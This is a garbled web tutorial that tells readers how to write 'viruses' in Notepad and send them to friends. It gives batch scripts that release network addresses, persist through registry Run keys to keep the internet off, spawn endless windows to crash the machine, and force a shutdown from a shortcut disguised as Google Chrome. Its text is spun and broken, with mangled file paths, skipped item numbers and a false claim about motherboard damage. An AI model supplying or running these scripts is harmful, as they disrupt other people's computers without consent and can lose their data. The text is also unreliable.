How to make a Virus ? Create 20+ Virus in Notepad
Table of Contents
What is a Virus?
The virus is a computer virus that enters into the pc while not your permission and might have an effect on your information and software system.
Read Also: How to Hack Android using NGROK over the Internet
How to make a Virus in Notepad?
Read Also: Phishing Attack using Android Mobile with Termux
This virus stops anyone’s web access. you wish to sort. Copy the below code and paste it into the notepad.
@Echo off
Ipconfig /release
Now Save the file as a .bat format like stopweb.bat and sent it to your friend circle. The IP address is lost, and thus they won’t be able to fix it.
Well, if you would like to mend it. simply sort in IPconfig /renew. So, this is often one of the most effective notepad virus pranks.
#4. System shutdown virus
You can additionally produce a virus that may shut down computers. Well, this virus is harmless but will cause information loss because of an unexpected shutdown. Here’s how you’ll be able to create a shutdown virus to drag up a prank together with your friends.
1. Right-click on your desktop then select the option “Create Shortcut”
2. Now type in ” Shutdown -s -t 60 -c “Virus is Detected. A computer is shutting down “. the pc is shutting down.” rather than sixty, you’ll be able to place what value you would like. It represents the time in seconds.
3. Then click on the Next button and type chrome. Or no matter what you would like.
4. Then you need to change the icon of the shortcut, opt for the icon of Google Chrome.
Your virus can seem like Google Chrome. you can carry this file in your Pendrive and may shut down your friends’ laptop.
#5 Internet Permanently Disabled
Copy & Paste the below code will disable anyone’s internet connectivity PERMANENTLY.
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho Your Internet is DISABLED!
PAUSE
#6 Endless Notepads
The below code will pop up endless notepads until the computer freezes and crashes!
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
#8 Application Bomber
This is another dangerous virus that can freeze computers in no-time.
Basically, this virus will open different applications repeatedly which forces the computer to freeze. This virus can also damage your motherboard, so try this at your own risk.
@echo off
😡😁😁☹️
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
” Wait some more time for the upcoming virus list. “
So this is often all regarding how to make a virus in notepad. By this technique, you’ll simply produce the harmful and harmless virus and might make your friends fool.
If you’ve got a lot of tricks like this, you can share them with us. I hope you like the post! Don’t forget to share this cool post together with your friends.
How can I write it in my computer then send it to another computer
You can make a virus in notepad and save it with .bat extension. You can send it to another computer with the help of Pen drive.